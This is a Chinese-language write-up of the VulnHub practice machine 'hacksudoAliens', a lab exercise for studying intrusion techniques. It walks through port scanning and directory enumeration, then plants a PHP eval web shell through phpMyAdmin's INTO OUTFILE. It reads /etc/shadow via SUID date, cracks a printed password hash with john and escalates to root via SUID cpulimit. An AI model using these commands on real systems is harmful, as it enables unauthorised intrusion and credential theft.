hacksudoAliens
hacksudoAliens
1 靶机介绍
https://www.vulnhub.com/ 下载
Virtualbox 仅主机网卡 启动
2 测试过程
2.1 nmap探测ip
nmap -sP 192.168.56.0/24
已知
192.168.56.1 为网关
192.168.56.100 为DHCP服务器
192.168.56.137 为kali ip
所以确定靶机为192.168.56.101
2.2 nmap扫描端口
nmap -sC -sV -A -p- 192.168.56.101 -o port.txt
root@kali:~/baji/vulnhub/hacksudoAliens# nmap -sC -sV -A -p- 192.168.56.101 -o port.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-12 09:21 CST
Nmap scan report for 192.168.56.101
Host is up (0.00028s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 31:d8:56:f4:cf:8b:09:e8:a1:5e:2e:dd:ac:08:6b:dd (RSA)
| 256 cd:65:ec:9e:d0:2c:6b:4e:02:40:c3:fd:01:5d:d1:87 (ECDSA)
|_ 256 03:00:28:0e:0b:da:12:68:c3:c5:45:ab:bb:92:92:fa (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo Alien?
9000/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: phpMyAdmin
MAC Address: 08:00:27:17:0A:ED (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.28 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
9000/tcp open http Apache httpd 2.4.38 ((Debian))
从扫描结果 可以看到9000端口为phpmyadmin 很熟悉
2.3 测试思路
- 80端口 目录枚举,各功能点漏洞探测。源码审查。
- 9000端口 phpmyadmin,爆破,版本漏洞
- 22端口 爆破。
2.4 80端口探测
只有一堆js文件
2.5 gobuster目录枚举
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.56.101/ -x ".html,.txt,.php,.js"
/index.html (Status: 200) [Size: 2225]
/images (Status: 301) [Size: 317] [–> http://192.168.56.101/images/]
/game.js (Status: 200) [Size: 8394]
/game.html (Status: 200) [Size: 701]
/engine.js (Status: 200) [Size: 11947]
/backup (Status: 301) [Size: 317] [–> http://192.168.56.101/backup/]
/data.js (Status: 200) [Size: 5847153]
/alien.js (Status: 200) [Size: 947]
/server-status (Status: 403) [Size: 279]
2.6 翻目录
backup 有一个数据库备份文件
2.7 查看mysql.bak
发现mysql登录的账号密码 vishal hacksudo
这样子的话 9000端口 phpmyadmin就有了。
2.8 9000端口phpmyadmin登录
登录成功
看有没有写入权限,有的话直接写入马getshell
show global variables like ‘%secure_file_priv%’
为空 可以写入任意文件。
写入马 蚁剑连接即可。
select '<?php @eval($_POST[a]);?>'INTO OUTFILE '/var/www/html/shell.php'
2.9 蚁剑连接
2.10 反弹shell
2.11 切换完整终端
- python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
- export TERM=xterm 然后 Ctrl+Z 退出来一下
- stty raw -echo;fg 回车后输入 reset 再回车
- stty rows 46 columns 188
之后就可以进行后渗透提权了
3 提权
3.1 信息收集
3.1.1 用户信息收集
www-data@hacksudo:/var/www/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
mysql:x:118:126:MySQL Server,,,:/nonexistent:/bin/false
3.1.2 suid信息收集
find / -user root -perm -4000 -print 2>/dev/null
可以使用date读取任意文件
3.2 suid权限的date读取shadow
LFILE=/etc/shadow
date -f $LFILE
3.3 john 破解ssh密码
- 将
hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::
复制到 ssh.txt
- john ssh.txt
- john ssh.txt --show
可以看到 密码为aliens
3.4 su hacksudo
3.5 信息收集
发现有root suid权限的文件
3.6 cpulimit提权
./cpulimit -l 100 -f – /bin/sh -p
3.7 读取flag
4 总结
本次靶机比较简单
- 通过端口扫描发现80,9000(phpmyadmin目录),22端口。
- 通过80端口目录枚举发现数据库备份文件,登录phpmyadmin。
- phpmyadmin后台写文件getshell。
- suid date 读取shadow。
- john解密shadow。
- suid cpulimit 提权。